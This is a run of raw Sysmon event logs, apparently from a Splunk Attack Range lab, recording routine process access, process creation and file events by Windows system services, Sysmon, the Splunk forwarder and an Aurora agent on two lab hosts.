12:31:30.365{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.365{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.365{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.366{FE4C2B44-E6A2-63C7-A606-00000000AF02}7852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000048807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:30.235{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=7E4F6FF3FF9AE699D7047171B269A34F,SHA256=94907048AF9CA24721D5DB7102BE48D98B4E394510C29349D15ADA3CECC4E3A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000019110Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.870{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8058AFA6B19836C24F59F5D624DBFC40,SHA256=5211539FF81EF24C39ADD4F35434321C4511E9295084A093B42736BE456C046E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019109Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.730{E5A8D418-E6A3-63C7-4602-00000000B002}15243648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019108Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.577{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E6A3-63C7-4602-00000000B002}1524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019107Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.575{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019106Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.575{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019105Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.575{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019104Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.575{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019103Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.575{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019102Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.575{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019101Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.575{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019100Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.574{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019099Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.574{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019098Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.574{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E6A3-63C7-4602-00000000B002}1524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019097Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.574{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E6A3-63C7-4602-00000000B002}1524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019096Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:31.573{E5A8D418-E6A3-63C7-4602-00000000B002}1524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000048855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.853{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.835{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program 